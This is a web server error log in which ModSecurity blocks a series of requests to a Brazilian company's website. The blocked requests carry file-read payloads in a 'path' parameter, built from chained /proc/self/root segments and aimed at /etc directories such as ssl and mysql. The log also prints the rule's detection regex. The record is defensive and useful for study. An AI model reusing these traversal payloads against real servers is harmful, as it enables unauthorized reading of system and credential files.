[Mon Mar 16 10:21:30.555017 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.243.203:49890] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD2njZBu2q05ozVU9H0QAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:31.862794 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:49894] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD27ysWC90G-1nBrA3oQAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:33.147082 2026] [:error] [pid 10772:tid 140411733534464] [client 74.7.243.203:49906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD3f9ocpUE4ed4uDzfrwAAAgE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:35.532132 2026] [:error] [pid 10772:tid 140411624429312] [client 74.7.243.203:49918] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD3_9ocpUE4ed4uDzfswAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:36.822042 2026] [:error] [pid 21533:tid 140411599251200] [client 74.7.243.203:49934] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD4HjZBu2q05ozVU9H0wAAAVE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:38.021109 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:49946] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD4tSswJuvopo3lOhSlQAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:39.326574 2026] [:error] [pid 11972:tid 140411699963648] [client 74.7.243.203:49962] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD45qj1wV0Si-OkefbcwAAAAU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:40.669667 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.243.203:57592] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD5HjZBu2q05ozVU9H1gAAAUI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:41.851817 2026] [:error] [pid 32654:tid 140411548894976] [client 74.7.243.203:57598] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD5QlT9VtDQc7bgUye2QAAARc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:42.845399 2026] [:error] [pid 32654:tid 140411691570944] [client 74.7.241.46:57368] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD5glT9VtDQc7bgUye2gAAAQY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:43.250599 2026] [:error] [pid 21533:tid 140411658000128] [client 74.7.243.203:57604] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD53jZBu2q05ozVU9H1wAAAUo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:44.421776 2026] [:error] [pid 10651:tid 140411607643904] [client 74.7.243.203:57614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD6LysWC90G-1nBrA3ogAAAZA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:45.913818 2026] [:error] [pid 21946:tid 140411590858496] [client 74.7.243.203:57616] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD6XbQATo66fKoS7w_pwAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:46.155014 2026] [:error] [pid 11972:tid 140411548894976] [client 74.7.241.46:60912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD6pqj1wV0Si-OkefbdwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:47.262843 2026] [:error] [pid 21805:tid 140411725141760] [client 74.7.243.203:57630] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD67ABkC4fWIHEf8HdpwAAAEI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:48.478364 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.243.203:57632] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD7LABkC4fWIHEf8HdqAAAAEA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:49.650993 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:57644] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD7bysWC90G-1nBrA3owAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:50.976802 2026] [:error] [pid 10772:tid 140411699963648] [client 74.7.243.203:35884] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD7v9ocpUE4ed4uDzfuQAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:52.184147 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.243.203:35898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD8I6lpbStxTqkSktgWQAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:53.483263 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:35904] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD8bABkC4fWIHEf8HdqQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 10:21:53.911484 2026] [:error] [pid 10772:tid 140411691570944] [client 74.7.241.46:60926] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abgD8f9ocpUE4ed4uDzfvQAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
